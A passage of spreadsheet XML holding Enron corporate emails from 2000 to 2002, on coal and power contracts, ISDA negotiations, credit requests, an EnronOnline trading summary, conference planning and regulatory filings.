Congratulations to proud parents Nettelton and Louise Kitchen, COO, Enron=_x000D_
=20_x000D_
Americas. Their son, Scott William, was born on May 9 and weighed 9 lbs.1 o=_x000D_
z._x000D_
_x000D_
_x000D_
NEWS FROM THE GLOBAL FLASH_x000D_
_x000D_
Enron closes major coal deal in Germany_x000D_
After almost six months of negotiations, Enron's coal team has signed a=20_x000D_
contract with Stadtwerke Bremen to supply this major German municipality wi=_x000D_
th=20_x000D_
coal until 2006. Under the deal structure, Enron will deliver a total of 4.=_x000D_
6=20_x000D_
million tonnes of coal - equivalent to an overall contract volume of almost=_x000D_
=20_x000D_
$200 million  (DM 440 million)._x000D_
_x000D_
The agreement represents Enron's first significant long-term coal supply de=_x000D_
al=20_x000D_
in Germany. The annual contractual volume amounts to around 3% of total=20_x000D_
German coal imports and provides us with continuous volume flow in Northern=_x000D_
=20_x000D_
Germany, enabling us to grow our position in the market._x000D_
_x000D_
Parallel to this deal, Enron also entered into a separate agreement with HM=_x000D_
S=20_x000D_
Bergbau Agentur, a company specialising in Polish exports. Under this=20_x000D_
agreement, HMS will be the handling agent and a potential supplier of Polis=_x000D_
h=20_x000D_
coal to us over the lifetime of the contract._x000D_
_x000D_
Congratulations to the whole team involved: Sven Becker, Manfred Ungethum,=_x000D_
=20_x000D_
Cornelia Luptowitsch, Peter Bradley, Jez Peters and Michael Schuh._x000D_
_x000D_
_x000D_
LEGAL STUFF_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y=20_x000D_
to Enron Corp. and its subsidiaries.  It is intended for internal use only=_x000D_
=20_x000D_
and should not be disclosed.</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 07:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Nominations for February</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris H Foster/HOU/ECT on 01/25/2001 _x000D_
03:35 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  CoganJA@aol.com                           01/25/2001 03:23 PM_x000D_
	_x000D_
_x000D_
To: Chris.H.Foster@enron.com_x000D_
cc: sbreen@czn.com, cwlipke@czn.com _x000D_
Subject: Re: Nominations for February_x000D_
_x000D_
_x000D_
Chris,_x000D_
_x000D_
Would you try to get the 3,000 scheduled under the IT agreement everyday.  If_x000D_
the back fill price from California, can get done for $10.00 or less, Sean_x000D_
has agreed that we can use the back fill option._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John_x000D_
_x000D_
John A. Cogan_x000D_
_x000D_
Johnco Group_x000D_
3629 Lake Kristin Drive_x000D_
Gretna, LA 70056_x000D_
Phone  (504) 392-7557_x000D_
Cell      (504) 491-2874_x000D_
Fax      (208) 730-4713_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Apr 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ISDA Master Agreement on behalf of Enron Australia Finance Pty_x000D_
 Limited</t>
  </si>
  <si>
    <t xml:space="preserve">Shari, Westpac have contacted me re putting in place an ISDA with EAF. As far _x000D_
as we ar concerned it will cover just power trades and commodities. A couple _x000D_
of questions. _x000D_
_x000D_
Our credit sheet required a MAC trigger (fall below BBB-) for additional _x000D_
credit support. Was this changed? The ISDA Schedule Westpac sent me has no _x000D_
such provision?  _x000D_
Can I have a copy of the Enron Corp.guaranty you finally settled with _x000D_
Westpac?  _x000D_
_x000D_
 Thanks_x000D_
    _x000D_
---------------------- Forwarded by David Minns/ENRON_DEVELOPMENT on _x000D_
04/11/2000 04:17 PM ---------------------------_x000D_
_x000D_
_x000D_
mlindeman@westpac.com.au on 04/11/2000 03:16:02 PM_x000D_
To: david.minns@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: ISDA Master Agreement on behalf of Enron Australia Finance Pty _x000D_
Limited_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David,_x000D_
_x000D_
Further to our telephone conversation, please find attached a draft copy of _x000D_
the_x000D_
Schedule to the ISDA Master Agreement.  I have based this draft on the _x000D_
recently_x000D_
completed agreement between Westpac and Enron North America Corp and your _x000D_
draft_x000D_
sent to me in September last year._x000D_
_x000D_
I would be grateful if you could review this draft and advise me of any _x000D_
comments_x000D_
that you may have.  If you require a copy of the American Schedule, please let_x000D_
me know and I will be happy to forward one to you._x000D_
_x000D_
As a  Guarantee is to be provided by Enron Corp, I would be grateful if you_x000D_
could supply a copy of this document for our review._x000D_
_x000D_
Please do not hesitate to contact me on any  of the numbers below should you_x000D_
have any questions._x000D_
_x000D_
Thank you for your assistance and I look forward to hearing from you very_x000D_
shortly._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Margaret Lindeman_x000D_
Documentation Administrator_x000D_
Documentation Support, Markets_x000D_
IB Legal_x000D_
Direct Telephone:   9284 8671_x000D_
Facsimile Number:   9283 1861_x000D_
Email Address:      mlindeman@westpac.com.au_x000D_
_x000D_
(See attached file: 3050 enron australia finance.doc)_x000D_
_x000D_
 - 3050 enron australia finance.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 05:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jane.allen@enron.com'})</t>
  </si>
  <si>
    <t>Green Card Forms</t>
  </si>
  <si>
    <t>As requested.   The supervisor form should be signed by Delaney and I will _x000D_
get David to sign.  Please complete to the best of your ability.  If anything _x000D_
is missing, we can follow-up with HR._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Jane</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deal # 440665</t>
  </si>
  <si>
    <t>Hi Mark, the trade listed above is entered as LADWPPX.  Should the _x000D_
counterparty be Los Angeles Department of Water and Power?_x000D_
_x000D_
Thanks,_x000D_
Melissa_x000D_
(713) 853-1886</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 01:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hey, Barbara</t>
  </si>
  <si>
    <t xml:space="preserve">How is it going?  I didn't get here until about 9:20.  Yikes.  I had 6 _x000D_
voicemail messages, when I got here.  Help._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 15:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris@lacimagroup.com'})</t>
  </si>
  <si>
    <t>Re: EPRM conferences</t>
  </si>
  <si>
    <t>Hi Paul,_x000D_
?_x000D_
Thanks for the e-mail. Sorry I missed your calls  this morning but I was at _x000D_
the dentist, where its difficult to speak at the best  of times!_x000D_
?_x000D_
I'm sorry but it doesn't look like we will be able  to commit to?the EPRM VaR _x000D_
conference. We are still a small company and the  trip would tie us up for _x000D_
over a week. I'm sure you'll understand that internally  we just can't _x000D_
justify?the two senior members of the company?to be away  on EPRM business _x000D_
and to have to pay money from our own pocket?to run this  course for you. It _x000D_
was a difficult decision originally to?offer our  services at expenses only _x000D_
with no fee, but we did so for the potential  opportunity to work some more _x000D_
with Vince._x000D_
?_x000D_
Good luck in your search for alternative course  leaders._x000D_
?_x000D_
Best regards._x000D_
?_x000D_
Chris._x000D_
?_x000D_
?_x000D_
------------------------------------------_x000D_
Dr  Chris Strickland_x000D_
?_x000D_
Director, Lacima Group Ltd_x000D_
www.lacimagroup.com_x000D_
?_x000D_
School of Finance and Economics, University of  Technology, Sydney_x000D_
Financial Options Research Centre, University of Warwick,  UK_x000D_
_x000D_
?_x000D_
?_x000D_
?_x000D_
----- Original Message ----- _x000D_
From:  Paul  Bristow _x000D_
To: chris@lacimagroup.com _x000D_
Sent: Thursday, February 22, 2001 8:13  AM_x000D_
Subject: FW: EPRM conferences_x000D_
_x000D_
Hi  Chris,_x000D_
?_x000D_
Just  an extra note regarding the course. If the reimbursements are suitable _x000D_
I would  like to finalise the line-up ASAP (Vince and a European Enron _x000D_
representative).  If you were unable to participate I would need to offer _x000D_
alternative  invitations by the end of this week._x000D_
?_x000D_
All  the best,_x000D_
?_x000D_
Paul??_x000D_
?_x000D_
-----Original Message-----_x000D_
From: Paul Bristow  [mailto:pbristow@riskwaters.com]_x000D_
Sent: Wednesday, February 21, 2001  9:13 AM_x000D_
To: 'Chris Strickland'_x000D_
Subject: RE: EPRM  conferences_x000D_
_x000D_
_x000D_
Hi  Chris,_x000D_
?_x000D_
I've  been looking at the forward plan and the total budget for speaker _x000D_
expenses is  5500 pounds (US keyboard, no pound sign). At current exchange _x000D_
rates this comes  to a little over 15,000 Australian dollars. I would be _x000D_
happy to cover your  expenses up to this figure._x000D_
?_x000D_
The  course is scheduled to run in Amsterdam (not London as originally _x000D_
planned) and  Houston. The dates are slightly flexible?to?work with your _x000D_
travel  schedules. For instance, would you prefer to travel to  _x000D_
Sydney-Houston-Amsterdam-Sydney, or in the opposite  direction?_x000D_
?_x000D_
If  you could contact me to?let me know if this would?enable you to  commit _x000D_
to the course, I would be delighted to forward the notes from the  research. _x000D_
I would plan to then work on the outline until March  1st.I look forward to _x000D_
speaking with you  soon._x000D_
?_x000D_
Best  wishes,_x000D_
?_x000D_
Paul  Bristow?_x000D_
-----Original Message-----_x000D_
From: Chris Strickland  [mailto:chris@lacimagroup.com]_x000D_
Sent: Tuesday, February 06, 2001  5:18 PM_x000D_
To: pbristow@riskwaters.com_x000D_
Subject: Re: EPRM  conferences_x000D_
_x000D_
_x000D_
Hi Paul,_x000D_
?_x000D_
Bit of a busy morning here - I'll be out for  about 1.5 hrs (9.15 Sydney _x000D_
time). If we don't catch up today, I'll call  tomorrow._x000D_
?_x000D_
Chris._x000D_
?_x000D_
----- Original Message ----- _x000D_
From:  Paul Bristow _x000D_
To: 'Chris Strickland' _x000D_
Sent: Tuesday, February 06, 2001 1:33  AM_x000D_
Subject: RE: EPRM conferences_x000D_
_x000D_
Hi Chris,_x000D_
?_x000D_
I would like to confirm the dates of some of the  forthcoming EPRM events:_x000D_
?_x000D_
Effective VaR and stress testing  techniques for the US energy industry. This _x000D_
event will run on the  21 &amp; 22 May in London and the 28 &amp; 29 May in Houston. _x000D_
Michele Du  Berry (Director of Conferences) and I are looking at how we have  _x000D_
structured the training courses and are keen to present a different  outline _x000D_
than on previous courses. I would like to run this event with 2-3  trainers _x000D_
per venue, rather than with 7-8 as we have done in the past. If  you and Les _x000D_
Clewlow would be interested in leading this course (possible  with Vince _x000D_
Kaminski) I would be delighted to discuss the event in greater  detail._x000D_
?_x000D_
Energy &amp; Power Risk Management,  Europe. Our largest annual European event is _x000D_
scheduled to between  September 19-21. Victoria Kerridge will be producing _x000D_
this event from the  London office and will be starting research in two _x000D_
weeks. I am going to be  providing her with a brief and will ensure that she _x000D_
has your contact  details._x000D_
?_x000D_
I have also been finalizing the details for the  annual Energy &amp; Power Risk _x000D_
Management event in Houston. This will take  place on May 14th &amp; 15th and is _x000D_
close to completion. I would be happy  to provide you with more details, _x000D_
without potentially running the risk of  overloading your schedule with a _x000D_
number of events in a short space of time  (VaR and EPRM, Houston). My _x000D_
priority is to secure trainers for our VaR  course._x000D_
?_x000D_
If you would be interested in any of the events  listed, I would be happy to _x000D_
talk with you this week. My direct line is 212  925 6990, extension 225. _x000D_
?_x000D_
Best wishes,_x000D_
?_x000D_
Paul Bristow_x000D_
?_x000D_
?_x000D_
-----Original Message-----_x000D_
From: Chris Strickland  [mailto:chris@lacimagroup.com]_x000D_
Sent: Sunday, January 28, 2001  8:02 PM_x000D_
To: pbristow@riskwaters.com_x000D_
Subject: EPRM  conferences_x000D_
_x000D_
_x000D_
Hi Paul,_x000D_
?_x000D_
Just a note so that you have my address. Do  you have dates for the US and _x000D_
European conferences yet? I'm sure that we  can arrange other work at the _x000D_
same time to offset the expenses of  speaking at these events if you want us _x000D_
to participate._x000D_
?_x000D_
You also mentioned a training course on VaR  and the energy area. We had an _x000D_
EPRM article last year with Vince on a  comparison of the different _x000D_
techniques on a trial portfolio that might  form the basis of something _x000D_
useful. Anyway, let me know._x000D_
?_x000D_
Best regards._x000D_
?_x000D_
Chris._x000D_
?_x000D_
?_x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:52:18 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,  Attached is a draft.  Please review and let's discuss before you send to Huber.  _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 07:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Thursday Night!</t>
  </si>
  <si>
    <t>which telas?  the one on shepard or near montrose?</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 05:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'bryan.hull@enron.com', 'kevin.a.boone@accenture.com', 'val.generes@accenture.com', 'luis.mena@enron.com', 'chad.landry@enron.com', 'mmmarcantel@equiva.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 04/30/2001 _x000D_
12:06 PM ---------------------------_x000D_
_x000D_
_x000D_
"Ryan Lee" &lt;ralee@rmi.net&gt; on 04/27/2001 03:33:09 PM_x000D_
To: &lt;Matthew.Lenhart@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Coors fiels Baby!_x000D_
_x000D_
_x000D_
I'd go top-shelf.  Are we getting laid in Vegas?_x000D_
----- Original Message -----_x000D_
From: &lt;Matthew.Lenhart@enron.com&gt;_x000D_
To: &lt;ralee@rmi.net&gt;_x000D_
Sent: Friday, April 27, 2001 11:49 AM_x000D_
Subject: Re: Coors fiels Baby!_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; i was going to come home this weekend if you knew them.  we would have to_x000D_
&gt; set up a service contract with those chicks._x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:40:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thierry.noel@enron.com'})</t>
  </si>
  <si>
    <t>Delphi Automotive DPH)</t>
  </si>
  <si>
    <t>Stephanie,_x000D_
I need to get an ISDA set-up with Delphi Automotive (NYSE DPH). Ken Curry is looking into credit limits. As soon as you have it ready, thanks for forwarding to me the two copies (I am now located in Enron South at 04848). I want to forward it with other documents to the client._x000D_
_x000D_
Many Thanks_x000D_
_x000D_
ext 55885</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>City of Bryan Dec parking transactions</t>
  </si>
  <si>
    <t xml:space="preserve">Following discussions with you and Doug, attached is a draft parking _x000D_
transaction agreement for your review and, if acceptable, for circualtion to _x000D_
the counterparty.  Please call me with any questions.  --David_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 08:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jim.meyer@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Ben_x000D_
I have faxed to your office both Caledonia &amp; Brownsville's complete physical _x000D_
inventorys as of 12-8-00 _x000D_
In the last hour, one report was 27 pages the other 40 pages_x000D_
Sincerely,_x000D_
Jim Meyer_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Benjamin Rogers_x000D_
12/08/2000 03:46 PM_x000D_
To: Jim Meyer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Jim:_x000D_
Pat Cathers was going to call you to have you send me e-mail or fax the spare _x000D_
parts list if you haven't done so all ready.  Thanks_x000D_
Ben_x000D_
713-853-7998_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 08:22:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.bodnar@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'perry.frazier@enron.com', 'esther.dasilva@enron.com', 'michael.bodnar@enron.com', 'lorraine.lindberg@enron.com', 'angela.white@enron.com', 'craig.buehler@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'paul.cherry@enron.com', 'sandy.sheffield@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>Credit Approval Request - Tenaska Marketing Ventures</t>
  </si>
  <si>
    <t>_x000D_
Credit Requested_x000D_
_x000D_
Shipper : 		Tenaska Marketing Ventures	_x000D_
Contract # :		27792_x000D_
Service Type :	Amended FT_x000D_
MDQ:			21,000 Dth/d _x000D_
Rate:			$0.10_x000D_
Term:			January 8, 2002 through January 8, 2002_x000D_
_x000D_
_x000D_
Thanks................._x000D_
Mike Bodnar</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 02:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear David_x000D_
_x000D_
Thank you for your email.  Enclosed is a copy of the latest set of our _x000D_
General Terms and Conditions.  Following are the comments on the points which _x000D_
you raised:_x000D_
_x000D_
1. Calculation Period.  We have used the term "Calculation Period" as that is _x000D_
a term which is used in the Australian electricity market.  Although it is _x000D_
common practice for the "Calculation Period" to be defined in confirmations _x000D_
by reference to an attached schedule we have also included a definition in _x000D_
paragraph 2.1(h) of the attached General Terms and Conditions (Electricity _x000D_
Financial - Australia)._x000D_
_x000D_
2. Notional Quantity per Contract Period.  In the electricity market in _x000D_
Australia it is standard practice to refer to the "Notional Quantity per _x000D_
Calculation Period" in megawatt hours.   Hence, for consistency we would _x000D_
prefer to use that term.  _x000D_
_x000D_
We recognise under Section 4.3 of the 1993 Commodity Definitions the terms _x000D_
"Notional Quantity" and "Notional Quantity per Calculation Period" are _x000D_
interchangeable._x000D_
_x000D_
3. Index.  We prefer to use the current definition of the Index because it _x000D_
directly tracts the wording used to describe a spot price in Australian _x000D_
Addendum No. 13 to the ISDA Master Agreement which covers electricity _x000D_
transactions.  You will note for this addendum is incorporated into the GTCs _x000D_
pursuant to paragraph 2.1(g)._x000D_
_x000D_
Enclosed are the latest versions of the long form product definitions for _x000D_
swaps.  They cover three load shapes being peak, off peak and flat._x000D_
_x000D_
Regards_x000D_
_x000D_
David Minns_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 11:57:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Litigation Counsel Approval - Lakeside Packers</t>
  </si>
  <si>
    <t xml:space="preserve">Peter, your proposed counsel picks are fine by me. Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Keohane, Peter  _x000D_
Sent:	Monday, April 30, 2001 11:26 AM_x000D_
To:	Derrick Jr., James; Haedicke, Mark; Sanders, Richard_x000D_
Cc:	Taylor, Mark; Johnston, Greg; Crawford, Sharon_x000D_
Subject:	Litigation Counsel Approval - Lakeside Packers_x000D_
_x000D_
We have a counterparty (Lakeside Packers) who refuses to perform to a 5 year fixed for floating power swap which commenced Jan. 01 and is C$2.5MM (US$1.7MM) in the money to us and booked (we would take a hit to earnings by that amount to unwind the deal).  Unfortunately, without the involvement of Legal, the deal was executed without paper, but on the basis that it was subject to our standard ISDA documentation.  The Confirm was sent out on that basis but not executed by the counterparty.  There was some agreement on guarantee support, but as this was less clear to get the underlying deal put in place, with the approval of Credit, we gave up the requirement for the guarantee in our subsequent discussions and demand letter._x000D_
_x000D_
We want to pursue the matter by commencing litigation._x000D_
_x000D_
Lakeside is traditionally represented by Blakes._x000D_
_x000D_
My suggestion would be to use the Duncan McCachen firm, a litigation boutique who we have used in the past (CIBC litigation).  Mike McCachen has a good understanding of the trading business for a litigation lawyer.  Alternatively, I would suggest Clarke Hunter of Macleod Dixon who is currently representing us on the NGX litigation and who also has a good understanding of out trading business.  Mike is a little more aggressive than Clarke, to my preference._x000D_
_x000D_
We would like to proceed as soon as possible as our demand letter expired last week, and our calls this morning were not dealt with satisfactorily._x000D_
_x000D_
Peter._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 09:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EnronOnline Executive Summary for November 14, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
EnronOnline Executive Summary for 11/14/00_x000D_
Transaction Summary	_x000D_
External Transactions Today	4,309_x000D_
Average Daily External Transactions (30 day Trailing Avg)	3,341_x000D_
Total Life to Date Transactions	435,374_x000D_
_x000D_
EnronOnline Daily % of Entity's Total Transactions for 11/14/00	Trans	Percent_x000D_
Enron North America	3,715	75%_x000D_
Enron Europe Limited	167	35%_x000D_
Global Products	159	27%_x000D_
Enron Metals	268	13%_x000D_
_x000D_
EnronOnline Percentage of Total Corporate Transactions _x000D_
(30 day Trailing Avg)	48%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	3,183,912,744_x000D_
MTD	27,761,070,884_x000D_
LTD	241,192,755,562_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	2,306,539,079_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	16,552,983,671_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	560_x000D_
New Counterparties transacting for the first time today	2_x000D_
Number of Products Offered Today	1,206_x000D_
Total Number of External Users Logged on Today	2,932_x000D_
Average # of External Users logged on (30 day Trailing Avg)	2,724_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>got it strapped on.  off to sacramento.  nice knowin' ya.  jeff</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 03:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Alison,_x000D_
_x000D_
I appreciate it. I really need your help on this one. His father is very _x000D_
helpful in my recruiting _x000D_
efforts at Berkeley._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Mary Alison Bailey                           10/25/2000 09:38 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Yaron's Resume  _x000D_
_x000D_
CORRECTION - I was going too fast last night ( You said Cornell not Carneige _x000D_
Mellon). Cornell interviews are Monday, October 30 &amp; Tuesday, October 31.  We _x000D_
are faxing Shmuel Oren's resume to Kristin and checking to see if  there is _x000D_
any time on the closed schedule, or if the interviewers will stay longer to _x000D_
include him.  I will let you know today if we can make it work._x000D_
_x000D_
Sorry my first e-mail was incorrect._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
10/24/2000 04:37 PM_x000D_
To: Charlene Jackson/Corp/Enron@ENRON_x000D_
cc: Mary Alison Bailey/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Yaron's Resume_x000D_
_x000D_
Charlene,_x000D_
_x000D_
Please, help. This is a son of a professor at Berkeley who helps me a lot in _x000D_
the recruiting process._x000D_
His son goes to Cornell. Can we invite him (the son, not the professor) to a _x000D_
Super Saturday? I really want_x000D_
to repay the debt to his father who is very instrumental in  my recruiting _x000D_
efforts._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 10/24/2000 _x000D_
04:40 PM ---------------------------_x000D_
_x000D_
_x000D_
"Shmuel Oren" &lt;oren@ieor.berkeley.edu&gt; on 10/23/2000 04:37:25 PM_x000D_
To: &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Yaron's Resume_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
 - Yaron-RESUME3.doc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 14:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'dblack@enron.com', 'james.d.steffes@enron.com', 'paul.kaufman@enron.com', 'jlewis@enron.com', 'tjohnso8@enron.com', 'leslie.lawner@enron.com', 'robert.neustaedter@enron.com', 'susan.j.mara@enron.com'})</t>
  </si>
  <si>
    <t>FW: A.00-11-056 PG&amp;E's Testimony</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: Piccillo, Roxanne [mailto:RTP1@pge.com]_x000D_
Sent: Friday, April 13, 2001 5:10 PM_x000D_
To: dws@keywaycorp.com; wbooth@booth-law.com; brbarkovich@earthlink.net;_x000D_
FurutaNJ@efawest.navfac.navy.mil; Dhuard@Manatt.com;_x000D_
wendy@econinsights.com; jweil@aglet.org; Slocum, Gail (Law); Warnock,_x000D_
John; rschmidt@bartlewells.com; ed@clfp.com; TKnox@KLALawfirm.com;_x000D_
Kpoole@adamsbroadwell.com; Mmattes@nossaman.com;_x000D_
Tomb@crossborderenergy.com; dhungerf@energy.state.ca.us.;_x000D_
J.P.Shotwell@SCE.Com; James.Schichtl@SCE.Com; Akbar.Jazayeri@SCE.Com;_x000D_
TangDC@SCE.com; sfc@cpuc.ca.gov; epoole@adplaw.com; rmccann@cal.net;_x000D_
riald@Kindermorgan.com; Pease, Daniel; Coyne, Keith; JHAY@SEMPRA.COM;_x000D_
WSAXE@SDGE.com; Mderbas@Sempra.com; JPARSONS@Sempra.com;_x000D_
JPAROTT@Sempra.com; TBrill@Sempra.com; ctd@cpuc.ca.gov;_x000D_
jbennett@gmssr.com; Ross, Steven; dsh@cpuc.ca.gov; MSchneider@sdge.com;_x000D_
KMcCrea@sablaw.com; Mbrubaker@consultbai.com; Bill@jbsenergy.com;_x000D_
dlf@cpuc.ca.gov; pmd@cpuc.ca.gov; mv1@cpuc.ca.gov; scr@cpuc.ca.gov;_x000D_
Bob_Anderson@apses.com; jmn@cpuc.ca.gov; bsl@cpuc.ca.gov;_x000D_
achalfant@consultbai.com; bkriz@bsmesi.com; dmarshall@greggind.com;_x000D_
bhaj@dpw.co.la.ca.us; subba_krishna@rmiinc.com;_x000D_
mjaske@energy.state.ca.us; melanie_gillette@rmiinc.com;_x000D_
cmkehrein@ems-ca.com_x000D_
Subject: FW: A.00-11-056 PG&amp;E's Testimony_x000D_
Importance: High_x000D_
_x000D_
_x000D_
To:  Rate Design Workshop Participants:_x000D_
_x000D_
In addition to the information below, I am forwarding the electronic_x000D_
workpapers to the Workshop Participants._x000D_
_x000D_
_x000D_
Roxanne Piccillo_x000D_
PG&amp;E Case Coordinator_x000D_
rtp1@pge.com_x000D_
(415) 973-6593_x000D_
_x000D_
Electronic Workpapers_x000D_
_x000D_
 &lt;&lt;BaselineRSPrev3.xls&gt;&gt;  &lt;&lt;RSP-PGE-RA.xls&gt;&gt;  &lt;&lt;RSP-PGE-RD-nonres1.XLS&gt;&gt;_x000D_
&lt;&lt;RSP-PGE-RD-res1.XLS&gt;&gt;_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:  Piccillo, Roxanne_x000D_
&gt; Sent: Friday, April 13, 2001 5:02 PM_x000D_
&gt; To: 'abb@eslawfirm.com'; 'ad046@detroit.freenet.org';_x000D_
&gt; 'alexm@calpine.com'; 'anchau@shellus.com'; 'aorchar@smud.org';_x000D_
&gt; 'askaff@energy-law-group.com'; 'ath@cpuc.ca.gov'; 'athomas@newenergy.com';_x000D_
&gt; 'awp@cpuc.ca.gov'; 'bfinkelstein@turn.org';_x000D_
&gt; 'bill.mccallum@ci.fresno.ca.us'; 'bill.wells@afcesa.af.mil';_x000D_
&gt; 'bill@jbsenergy.com'; 'bishop@jrwood.com'; 'blaising@braunlegal.com';_x000D_
&gt; 'bloomje@la.whitecase.com'; 'bob_anderson@apses.com';_x000D_
&gt; 'bpowers@seniors.org'; Bowen, Bruce; 'brbarkovich@earthlink.net';_x000D_
&gt; 'bsl@cpuc.ca.gov'; 'btenney@landuselaw.com'; 'callen@akingump.com';_x000D_
&gt; 'car@cpuc.ca.gov'; 'chilen@llgm.com'; 'chrism@mid.org';_x000D_
&gt; 'chrisw@greenlining.org'; 'clpearce@duanemorris.com';_x000D_
&gt; 'cmkehrein@ems-ca.com'; 'cmw@cpuc.ca.gov'; 'cpeyton@sa.com';_x000D_
&gt; 'cread@steptoe.com'; 'ctd@cpuc.ca.gov'; 'cwrmccv@worldnet.att.net';_x000D_
&gt; 'cyounger@manatt.com'; 'DavoodiKR@efaches.navfac.navy.mil';_x000D_
&gt; 'dcarroll@dbsr.com'; 'ddavie@hesinet.com'; 'derkp@newsdata.com';_x000D_
&gt; 'dhuard@manatt.com'; 'difellman@energy-law-group.com';_x000D_
&gt; 'dkk@eslawfirm.com'; 'dlf@cpuc.ca.gov'; 'dmarcus@slip.net';_x000D_
&gt; 'dmarshall@greggind.com'; 'douglass@arterhadden.com';_x000D_
&gt; 'dpritchard@mofo.com'; 'dwrlegal1@water.ca.gov'; 'dws@keywaycorp.com';_x000D_
&gt; 'ed@apx.com'; 'ed@clfp.com'; 'edwardoneill@dwt.com'; 'ek@a-klaw.com';_x000D_
&gt; Lucha, Ed; 'emitchel@angnewspapers.com'; 'epoole@adplaw.com';_x000D_
&gt; 'firmiyas@dof.ca.gov'; 'fmo@sdcity.sannet.gov'; 'foothill@lmi.net';_x000D_
&gt; 'fosterbc@sce.com'; 'frank.cooley@sce.com'; 'freedman@turn.org';_x000D_
&gt; 'fua@cpuc.ca.gov'; 'furutanj@efawest.navfac.navy.mil'; 'fwmonier@tid.org';_x000D_
&gt; 'gdreed@sidley.com'; 'georgeperrault@msn.com';_x000D_
&gt; 'gerhordt.herbert@msdw.com'; 'gig@cpuc.ca.gov'; 'glwaas@calpx.com';_x000D_
&gt; 'gtbl@dynegy.com'; 'hbd@gweiss.com'; 'hchoy@isd.co.la.ca.us';_x000D_
